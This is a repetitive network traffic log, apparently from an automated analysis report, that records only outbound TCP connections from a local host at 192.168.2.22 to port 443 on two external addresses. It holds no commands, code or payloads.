            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
